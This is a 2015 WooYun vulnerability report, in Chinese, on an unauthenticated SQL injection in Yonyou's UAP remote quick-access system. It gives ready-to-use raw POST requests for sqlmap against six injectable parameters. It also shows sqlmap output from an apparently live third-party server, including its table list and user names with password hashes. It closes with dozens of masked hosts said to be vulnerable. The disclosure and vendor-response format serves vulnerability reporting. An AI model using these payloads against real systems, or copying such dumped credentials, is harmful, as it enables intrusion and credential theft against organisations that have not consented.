当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152899

漏洞标题:用友优普远程快速接入系统SQL注入漏洞(无需登陆/影响大量企业)

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2015-11-09 18:44

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

用友某通用平台sql注入漏洞(无需登陆,无限制获取数据,影响大量企业)

详细说明:

该系统是用友的优普U8系统,用户量很大,绕过测试,该问题影响使用该平台的所有企事业单位。
这里的sql注入点是root权限,可以写入文件并进一步利用。
注入点在:http://xxxx/Server/CmxItem.php?pgid=System_UpdateSave
post数据中的TeamName存在注入。其他注入点在后面给出吧
这里我们以**.**.**.**:81为例进行说明
先把payload贴这里吧,保存为XXX.txt,送给sqlmap就可以啦

POST /Server/CmxItem.php?pgid=System_UpdateSave HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LANGUAGES=cn; PHPSESSID=uefi1k8tmrru2hh5virr84i032
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
TeamName=test


直接看看注入点的信息

注入点信息.JPG


看看系统中的数据库吧

database.JPG


来看看表的信息,72张表

web application technology: Apache, PHP 5.4.27
back-end DBMS: MySQL 5.0
Database: rasdatabase
[72 tables]
+---------------------------+
| hbadminrolegroupmembers |
| hbadminrolerestrictedorgs |
| hbadminroletask |
| hbadminroleusermembers |
| hbclientgroupapplication |
| hbclientgroupprinter |
| hbdirectoryapplication |
| hborgapplication |
| hborglicensepolicy |
| hborgpolicy |
| hbpolicyvalues |
| hbroletask |
| hbserverapplication |
| hbserverprinterdriver |
| hbserverprintinf |
| hbserverrole |
| hbservertask |
| hbtaskaction |
| hbtaskcondition |
| hbuserapplication |
| hbuserdirectory |
| hbuserorgs |
| hbuserpolicy |
| lograsarchi |
| lograsconcurrenta |
| lograsconcurrentus |
| lograsent |
| lograssessi |
| lograstaskactionhist |
| lograstaskhist |
| oemuserinfo |
| rasactions |
| rasadminroles |
| rasadmintasks |
| rasapplication |
| rasbadprinterdriver |
| rascfg |
| rasclient |
| rasclientgroup |
| rascompatibilitydriver |
| rasconcurrentsession |
| rasconditions |
| rasconnectionsetting |
| rasdatabase |
| rasdirectory |
| rasdmzserverd |
| rasdomain |
| rasgroupuser |
| rasinfocollectordata |
| rasjobs |
| rasjobsteps |
| raslicenseinfo |
| raslicensetoken |
| raslicpolicy |
| raslockdownpolicies |
| rasmonthlyminute |
| rasorgs |
| rasprinter |
| rasprinterdriver |
| rasproductk |
| rasreqids |
| rasroles |
| rasrunningservers |
| rasselection |
| rasserver |
| rasstyle |
| rastasks |
| rasticketing |
| rastimedsessio |
| rasuser |
| rasusermng |
| usermachines |
+---------------------------+


看看用户信息

web application technology: Apache, PHP 5.4.27
back-end DBMS: MySQL 5.0
Database: rasdatabase
Table: rasuser
[7 entries]
+-----------+------------------------------------+
| UserName | Password |
+-----------+----------------------------------+
| RAS_01 | 0077721c169fad8e3e5aed60729d3e77 |
| RAS_demo | 2ac9b6c89caa8519103dc34b3d430e6a |
| Ras_admin | 47c1eb03755b751363eea24fb149f616 |
| RAS_07 | 49786e43a863aafd294ea260d270af78 |
| RAS_03 | 6668367528ad4f69171224e12c65626f |
| RAS_02 | 78fbbcc6c709ddd4168bde5c32105f26 |
| RAS_04 | ae555894eeb17518168bde5c32105f26 |
+-----------+----------------------------------+


其他5个注入点在这里
Post中的这下面5个参数也都存在注入,payload和利用方法类似:
TeamDescription
LogRasArchiPurgeDays
LogRasEntPurgeDays
LogUsagePurgeDays
JobRecordsPurgeDays

POST /Server/CmxItem.php?pgid=System_UpdateSave HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: LANGUAGES=cn; PHPSESSID=uefi1k8tmrru2hh5virr84i032
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
TeamDescription=test


最后来点案例吧

**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8888/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8001/download.php
http://**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8000/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8888/download.php
**.**.**.**:8888/download.php
**.**.**.**:8000/download.php
**.**.**.**:8000/download.php
**.**.**.**:8888/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php
**.**.**.**:8080/download.php
**.**.**.**:8000/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:81/download.php
**.**.**.**:8080/download.php

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-10 14:03

厂商回复:

已安排开发人员修复漏洞

最新状态:

暂无